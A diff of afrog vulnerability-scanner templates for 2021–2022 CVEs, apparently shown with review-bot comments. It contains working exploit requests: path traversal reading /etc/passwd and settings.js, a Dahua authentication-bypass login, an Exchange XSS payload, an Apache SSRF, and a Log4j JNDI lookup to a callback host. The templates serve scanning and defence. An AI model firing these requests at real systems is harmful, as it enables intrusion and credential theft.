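Review bot: The new name at line 4 has a misplaced space, `Pentahoa uthentication bypass`, and should read `name: Pentaho Authentication Bypass`. Other names added in this commit capitalise the product and the issue type, so that form also matches the surrounding style.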
  • ■ ■ ■ ■ ■ ■
    afrog-pocs/unreviewed/node-red-dashboard-file-read-cve-2021-3223.yml afrog-pocs/CVE/2021/CVE-2021-3223.yaml
    1  -id: node-red-dashboard-file-read-cve-2021-3223
     1 +id: CVE-2021-3223
    2 2   
    3 3  info:
    4  - name: node-red-dashboard-file-read-cve-2021-3223
     4 + name: Node RED Dashboard - Directory Traversal
    5 5   author: Print1n(http://print1n.top)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /ui_base/js/..%2f..%2f..%2f..%2fsettings.js
    16 13   expression: response.status == 200 && response.body.bcontains(bytes("Node-RED web server is listening")) && response.body.bcontains(bytes("username")) && response.body.bcontains(bytes("password"))
    skipped 2 lines
  • ■ ■ ■ ■ ■ ■
    afrog-pocs/unreviewed/dahua-cve-2021-33044-authentication-bypass.yml afrog-pocs/CVE/2021/CVE-2021-33044.yaml
    1  -id: dahua-cve-2021-33044-authentication-bypass
     1 +id: CVE-2021-33044
    2 2   
    3 3  info:
    4  - name: dahua-cve-2021-33044-authentication-bypass
     4 + name: Dahua IPC/VTH/VTO devices Authentication Bypass
    5 5   author: For3stCo1d (https://github.com/For3stCo1d)
    6  - severity: high
     6 + severity: critical
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: POST
    15 12   path: /RPC2_Login
    16 13   body: '{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}'
    skipped 5 lines
  • ■ ■ ■ ■ ■ ■
    afrog-pocs/cve/2021/CVE-2021-36260.yml afrog-pocs/CVE/2021/CVE-2021-36260.yaml
    skipped 9 lines
    10 10   - https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/
    11 11   - https://nvd.nist.gov/vuln/detail/CVE-2021-36260
    12 12   - https://github.com/Aiminsun/CVE-2021-36260
    13  - classification:
    14  - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    15  - cvss-score: 9.8
    16  - cve-id: CVE-2021-36260
    17  - cwe-id: CWE-77,CWE-20
    18  - metadata:
    19  - shodan-query: http.favicon.hash:999357577
    20  - tags: cve,cve2021,hikvision,rce,iot,intrusive
    21 13   
    22  -manual: true
    23  -transport: http
    24 14  set:
    25 15   r1: randomLowercase(5)
    26 16   r2: randomLowercase(5)
    skipped 2 lines
    29 19  rules:
    30 20   r1:
    31 21   request:
    32  - cache: true
    33 22   method: PUT
    34 23   path: /SDK/webLanguage
    35 24   headers:
    skipped 4 lines
    40 29   expression: response.status == 500 && response.body.bcontains(b"<requestURL>/SDK/webLanguage</requestURL>")
    41 30   r2:
    42 31   request:
    43  - cache: true
    44 32   method: GET
    45 33   path: /{{r4}}
    46 34   headers:
    skipped 1 lines
    48 36   expression: response.status == 200 && (response.body.bcontains(bytes(r1 + r3 + "^" + r4)) || response.body.bcontains(bytes(r1 + "${" + r2 + "}" + r3 + r4)))
    49 37   clean:
    50 38   request:
    51  - cache: true
    52 39   method: PUT
    53 40   path: /SDK/webLanguage
    54 41   headers:
    skipped 8 lines
  • ■ ■ ■ ■ ■ ■
    afrog-pocs/unreviewed/novnc-url-redirection-cve-2021-3654.yml afrog-pocs/CVE/2021/CVE-2021-3654.yaml
    1  -id: novnc-url-redirection-cve-2021-3654
     1 +id: CVE-2021-3654
    2 2   
    3 3  info:
    4  - name: novnc-url-redirection-cve-2021-3654
     4 + name: noVNC Open Redirect
    5 5   author: txf(https://github.com/tangxiaofeng7)
    6  - severity: high
     6 + severity: medium
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13 11   method: GET
    14 12   path: "/"
    15  - follow_redirects: false
    16 13   expression: |
    17 14   response.status == 200 && response.body.bcontains(b"<title>noVNC</title>")
    18 15   r1:
    19 16   request:
    20 17   method: GET
    21 18   path: "//baidu.com/%2f.."
    22  - follow_redirects: false
    23 19   expression: |
    24 20   response.status == 301 && response.headers["location"] == "//baidu.com/%2f../"
    25 21  expression: r0() && r1()
    skipped 2 lines
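Review bot: Dropping `follow_redirects: false` from rule r1 (old line 22) removes the one setting the rule's expression depends on: it asserts `response.status == 301` and reads `response.headers["location"]`, which only hold if the runner does not follow the redirect itself. If afrog's default is not to follow redirects the change is harmless, but that default is not visible here, so it is worth confirming, or keeping the single line `follow_redirects: false` in redirect-based rules. The same removal is made in CVE-2021-40438 (old line 28, whose expression asserts a 302), and the new CVE-2021-29622 file relies on the same default without setting it.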
  • ■ ■ ■ ■ ■ ■
    afrog-pocs/cve/2021/CVE-2021-36749.yml afrog-pocs/CVE/2021/CVE-2021-36749.yaml
    skipped 8 lines
    9 9   - https://nvd.nist.gov/vuln/detail/CVE-2021-36749
    10 10   - https://www.cvedetails.com/cve/CVE-2021-36749/
    11 11   - https://github.com/BrucessKING/CVE-2021-36749
    12  - classification:
    13  - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    14  - cvss-score: 6.5
    15  - cve-id: CVE-2021-36749
    16  - cwe-id: CWE-668
    17  - tags: cve,cve2021,apache,lfi,auth-bypass,druid
    18 12   
    19  -manual: true
    20  -transport: http
    21 13  rules:
    22 14   druid1:
    23 15   request:
    24  - cache: true
    25 16   method: POST
    26 17   path: /druid/indexer/v1/sampler?for=connect
    27 18   headers:
    skipped 3 lines
    31 22   expression: response.status == 200 && response.content_type.contains("json") && "root:[x*]:0:0:".bmatches(response.body)
    32 23   druid2:
    33 24   request:
    34  - cache: true
    35 25   method: POST
    36 26   path: /druid/indexer/v1/sampler?for=connect
    37 27   headers:
    skipped 6 lines
  • ■ ■ ■ ■ ■ ■
    afrog-pocs/cve/2021/CVE-2021-40438.yml afrog-pocs/CVE/2021/CVE-2021-40438.yaml
    skipped 4 lines
    5 5   author: pdteam
    6 6   severity: critical
    7 7   description: Apache 2.4.8 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.
    8  - remediation: Upgrade to Apache version 2.4.49 or newer.
    9 8   reference:
    10 9   - https://firzen.de/building-a-poc-for-cve-2021-40438
    11 10   - https://httpd.apache.org/security/vulnerabilities_24.html
    12 11   - https://nvd.nist.gov/vuln/detail/CVE-2021-40438
    13  - tags: cve,cve2021,ssrf,apache,mod-proxy
    14  - classification:
    15  - cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
    16  - cvss-score: 9.00
    17  - cve-id: CVE-2021-40438
    18  - cwe-id: CWE-918
    19 12   
    20  -manual: true
    21  -transport: http
    22 13  rules:
    23 14   r0:
    24 15   request:
    25  - cache: true
    26 16   method: GET
    27 17   path: /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://baidu.com/api/v1/targets
    28  - follow_redirects: false
    29 18   expression: response.status == 302 && response.headers["location"] == "http://www.baidu.com/search/error.html"
    30 19  expression: r0()
    31 20   
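Review bot: Removing `remediation: Upgrade to Apache version 2.4.49 or newer.` (old line 8) drops the one field that tells an operator what to do after a hit, and nothing on the new side carries that information. If the `remediation` key is no longer part of the afrog schema, fold the sentence into `description` instead, for example by appending ` Fixed in Apache 2.4.49 and newer.` to line 7. The same deletion happens in CVE-2021-41773 (old line 8), CVE-2021-44228 (old line 8) and CVE-2022-23131 (old line 8).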
  • ■ ■ ■ ■ ■ ■
    afrog-pocs/unreviewed/exchange-cve-2021-41349-xss.yml afrog-pocs/CVE/2021/CVE-2021-41349.yaml
    1  -id: exchange-cve-2021-41349-xss
     1 +id: CVE-2021-41349
    2 2   
    3 3  info:
    4  - name: exchange-cve-2021-41349-xss
     4 + name: Microsoft Exchange Server Pre-Auth POST Based Reflected Cross-Site Scripting
    5 5   author: zhibing(https://github.com/azhibing)
    6  - severity: high
     6 + severity: medium
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    skipped 4 lines
    17 15   body: <script>alert(1);+"=</script>
    18 16   expression: |
    19 17   response.status == 500 && response.body.bcontains(b"<script>alert(1)")
    20  -expression:
    21  - r0()
     18 +expression: r0()
    22 19   
    23 20   
  • ■ ■ ■ ■ ■ ■
    afrog-pocs/cve/2021/CVE-2021-41773.yml afrog-pocs/CVE/2021/CVE-2021-41773.yaml
    skipped 4 lines
    5 5   author: daffainfo
    6 6   severity: high
    7 7   description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
    8  - remediation: Update to Apache HTTP Server 2.4.50 or later.
    9 8   reference:
    10 9   - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
    11 10   - https://nvd.nist.gov/vuln/detail/CVE-2021-41773
    skipped 1 lines
    13 12   - https://twitter.com/ptswarm/status/1445376079548624899
    14 13   - https://twitter.com/h4x0r_dz/status/1445401960371429381
    15 14   - https://github.com/blasty/CVE-2021-41773
    16  - tags: cve,cve2021,lfi,rce,apache,misconfig,traversal
    17  - classification:
    18  - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    19  - cvss-score: 7.50
    20  - cve-id: CVE-2021-41773
    21  - cwe-id: CWE-22
    22  - metadata:
    23  - shodan-query: https://www.shodan.io/search?query=apache+version%3A2.4.49
    24 15   
    25  -manual: true
    26  -transport: http
    27 16  rules:
    28 17   cgibin0:
    29 18   request:
    skipped 11 lines
  • ■ ■ ■ ■ ■ ■
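--- a/afrog-pocs/unreviewed/gocd-cve-2021-43287.yml
+++ b/afrog-pocs/CVE/2021/CVE-2021-43287.yaml
@@ -1,26 +1,20 @@
-id: gocd-cve-2021-43287
+id: CVE-2021-43287
 
 info:
- name: gocd-cve-2021-43287
+ name: Pre-Auth Takeover of Build Pipelines in GoCD
  author: For3stCo1d (https://github.com/For3stCo1d)
- severity: high
+ severity: critical
 
-manual: true
-transport: http
 rules:
  linux0:
  request:
- cache: true
  method: GET
  path: /go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../../../../../../etc/passwd
- follow_redirects: false
  expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
  windows0:
  request:
- cache: true
  method: GET
  path: /go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../../../../../../windows/win.ini
- follow_redirects: false
  expression: response.status == 200 && (response.body.bcontains(b"for 16-bit app support") || response.body.bcontains(b"[extensions]"))
 expression: windows0() || linux0()
 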
  • ■ ■ ■ ■ ■ ■
    afrog-pocs/cve/2021/CVE-2021-44228.yaml afrog-pocs/CVE/2021/CVE-2021-44228.yaml
    skipped 4 lines
    5 5   author: melbadry9,dhiyaneshDK,daffainfo,anon-artist,0xceba,Tea
    6 6   severity: critical
    7 7   description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
    8  - remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later).
    9 8   reference:
    10 9   - https://logging.apache.org/log4j/2.x/security.html
    11 10   - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
    12 11   - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
    13 12   - https://www.lunasec.io/docs/blog/log4j-zero-day/
    14 13   - https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a
    15  - tags: cve,cve2021,rce,oast,log4j,injection
    16  - classification:
    17  - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    18  - cvss-score: 10.00
    19  - cve-id: CVE-2021-44228
    20  - cwe-id: CWE-502
    21 14   
    22 15  set:
    23 16   reverse: newReverse()
    24 17   reverseURL: reverse.url
    25  -manual: true
    26  -transport: http
    27 18  rules:
    28 19   r0:
    29 20   request:
    30  - cache: true
    31 21   method: GET
    32 22   path: /?x=${jndi:ldap://{{reverseURL}}/a}
    33 23   headers:
    skipped 21 lines
  • ■ ■ ■ ■ ■
    afrog-pocs/cve/2022/Spring-Cloud-Gateway-Code-Injection-CVE-2022-22947.yml afrog-pocs/CVE/2022/CVE-2022-22947.yaml
    1  -id: Spring-Cloud-Gateway-Code-Injection-CVE-2022-22947
     1 +id: CVE-2022-22947
    2 2   
    3 3  info:
    4 4   name: Spring Cloud Gateway Code Injection
    skipped 2 lines
    7 7   tags: spring,spring-cloud,cloud,cve2022
    8 8   reference:
    9 9   - https://mp.weixin.qq.com/s/qIAcycsO_L9JKisG5Bgg_w
    10  - classification:
    11  - cve-id: CVE-2022-22947
    12 10   
    13  -transport: http
    14 11  set:
    15 12   router: randomLowercase(8)
    16 13   rand1: randomInt(800000000, 1000000000)
    skipped 1 lines
    18 15  rules:
    19 16   r0:
    20 17   request:
    21  - cache: true
    22 18   method: POST
    23 19   path: /actuator/gateway/routes/{{router}}
    24 20   headers:
    skipped 12 lines
    37 33   
    38 34   r1:
    39 35   request:
    40  - cache: true
    41 36   method: POST
    42 37   path: /actuator/gateway/refresh
    43 38   headers:
    skipped 2 lines
    46 41   
    47 42   r2:
    48 43   request:
    49  - cache: true
    50 44   method: GET
    51 45   path: /actuator/gateway/routes/{{router}}
    52 46   headers:
    skipped 2 lines
    55 49   
    56 50   r3:
    57 51   request:
    58  - cache: true
    59 52   method: DELETE
    60 53   path: /actuator/gateway/routes/{{router}}
    61 54   expression: response.status == 200
    62 55   
    63 56   r4:
    64 57   request:
    65  - cache: true
    66 58   method: POST
    67 59   path: /actuator/gateway/refresh
    68 60   headers:
    skipped 4 lines
  • ■ ■ ■ ■ ■ ■
    afrog-pocs/cve/2022/CVE-2022-23131.yaml afrog-pocs/CVE/2022/CVE-2022-23131.yaml
    skipped 4 lines
    5 5   author: For3stCo1d
    6 6   severity: critical
    7 7   description: When SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor because a user login stored in the session was not verified.
    8  - remediation: Upgrade to 5.4.9rc2, 6.0.0beta1, 6.0 (plan) or higher.
    9 8   reference:
    10 9   - https://support.zabbix.com/browse/ZBX-20350
    11 10   - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
    12 11   - https://nvd.nist.gov/vuln/detail/CVE-2022-23131
    13 12   - https://github.com/1mxml/CVE-2022-23131
    14  - metadata:
    15  - shodan-query: http.favicon.hash:892542951
    16  - fofa-query: app="ZABBIX-监控系统" && body="saml"
    17  - classification:
    18  - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    19  - cvss-score: 9.8
    20  - cve-id: CVE-2022-23131
    21  - tags: cve,cve2022,zabbix,auth-bypass,saml,sso
    22 13   
    23  -transport: http
    24 14  rules:
    25 15   r0:
    26 16   request:
    skipped 14 lines
  • ■ ■ ■ ■ ■
    afrog-pocs/cve/2022/CVE-2022-23134.yaml afrog-pocs/CVE/2022/CVE-2022-23134.yaml
    skipped 7 lines
    8 8   reference:
    9 9   - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
    10 10   - https://nvd.nist.gov/vuln/detail/CVE-2022-23134
    11  - classification:
    12  - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    13  - cvss-score: 5.3
    14  - cve-id: CVE-2022-23134
    15  - tags: cve,cve2022,zabbix,auth-bypass
    16 11   
    17 12  rules:
    18 13   r0:
    skipped 16 lines
  • ■ ■ ■ ■ ■ ■
    afrog-pocs/cve/2022/CVE-2022-23178.yaml afrog-pocs/CVE/2022/CVE-2022-23178.yaml
    skipped 8 lines
    9 9   - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-009/-credential-disclosure-in-web-interface-of-crestron-device
    10 10   - https://nvd.nist.gov/vuln/detail/CVE-2022-23178
    11 11   - https://de.crestron.com/Products/Video/HDMI-Solutions/HDMI-Switchers/HD-MD4X2-4K-E
    12  - tags: cve,cve2022,crestron,disclosure
    13  - classification:
    14  - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    15  - cvss-score: 9.80
    16  - cve-id: CVE-2022-23178
    17  - cwe-id: CWE-287
    18 12   
    19  -transport: http
    20 13  rules:
    21 14   r0:
    22 15   request:
    skipped 5 lines
  • ■ ■ ■ ■ ■
    afrog-pocs/cve/2022/CVE-2022-24112.yaml afrog-pocs/CVE/2022/CVE-2022-24112.yaml
    skipped 1 lines
    2 2   
    3 3  info:
    4 4   name: Apache APISIX apisix/batch-requests RCE
    5  - description: Apache APISIX apisix/batch-requests plugin allows overwriting the X-REAL-IP header to RCE;An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.
    6 5   author: Mr-xn
    7 6   severity: critical
     7 + description: Apache APISIX apisix/batch-requests plugin allows overwriting the X-REAL-IP header to RCE;An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.
    8 8   reference:
    9 9   - https://nvd.nist.gov/vuln/detail/CVE-2022-24112
    10 10   - https://www.openwall.com/lists/oss-security/2022/02/11/3
    11 11   - https://twitter.com/sirifu4k1/status/1496043663704858625
    12 12   - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests
    13  - metadata:
    14  - shodan-query: title:"Apache APISIX Dashboard"
    15  - fofa-query: title="Apache APISIX Dashboard"
    16  - product: https://apisix.apache.org
    17  - classification:
    18  - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    19  - cvss-score: 9.80
    20  - cve-id: CVE-2022-24112
    21  - cwe-id: CWE-290
    22  - tags: cve,cve2022,apache,rce,apisix,oast
    23 13   
    24 14  set:
    25 15   randstr: randomLowercase(6)
    26 16   reverse: newReverse()
    27 17   reverseURL: reverse.url
    28  -transport: http
    29 18  rules:
    30 19   r0:
    31 20   request:
    skipped 33 lines
    afrog-pocs/cve/2022/CVE-2022-24124.yaml afrog-pocs/CVE/2022/CVE-2022-24124.yaml
    skipped 12 lines
    13 13   - https://www.exploit-db.com/exploits/50792
    14 14   - https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-24124/vultarget
    15 15   - https://nvd.nist.gov/vuln/detail/CVE-2022-24124
    16  - classification:
    17  - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    18  - cvss-score: 7.5
    19  - cve-id: CVE-2022-24124
    20  - cwe-id: CWE-89
    21  - tags: cve,cve2022,casdoor,sqli,unauth
    22 16   
    23  - 
    24  -transport: http
    25 17  rules:
    26 18   r0:
    27 19   request:
    skipped 5 lines
    afrog-pocs/cve/2022/CVE-2022-24260.yaml afrog-pocs/CVE/2022/CVE-2022-24260.yaml
    skipped 10 lines
    11 11   - https://kerbit.io/research/read/blog/3
    12 12   - https://nvd.nist.gov/vuln/detail/CVE-2022-24260
    13 13   - https://www.voipmonitor.org/changelog-gui?major=5
    14  - classification:
    15  - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    16  - cvss-score: 9.80
    17  - cve-id: CVE-2022-24260
    18  - cwe-id: CWE-89
    19  - tags: cve,cve2022,voipmonitor,sqli,unauth
    20 14   
    21  -transport: http
    22 15  rules:
    23 16   r0:
    24 17   request:
    skipped 9 lines
    afrog-pocs/cve/2022/CVE-2022-24990.yaml afrog-pocs/CVE/2022/CVE-2022-24990.yaml
    skipped 10 lines
    11 11   - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24990
    12 12   - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/TerraMaster/TerraMaster%20TOS%20%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E%20CVE-2022-24990.md
    13 13   - https://github.com/lishang520/CVE-2022-24990
    14  -manual: true
    15  -transport: http
     14 + 
    16 15  rules:
    17 16   r0:
    18 17   request:
    19  - cache: true
    20 18   method: GET
    21 19   path: /module/api.php?mobile/webNasIPS
    22 20   headers:
    23 21   User-Agent: TNAS
    24  - follow_redirects: false
    25 22   expression: |
    26 23   response.status == 200 && response.body.bcontains(b'"code":true') && response.body.bcontains(b'"msg":"webNasIPS successful"')
    27 24  expression: r0()
    afrog-pocs/cve/2022/CVE-2022-25369.yaml afrog-pocs/CVE/2022/CVE-2022-25369.yaml
    skipped 4 lines
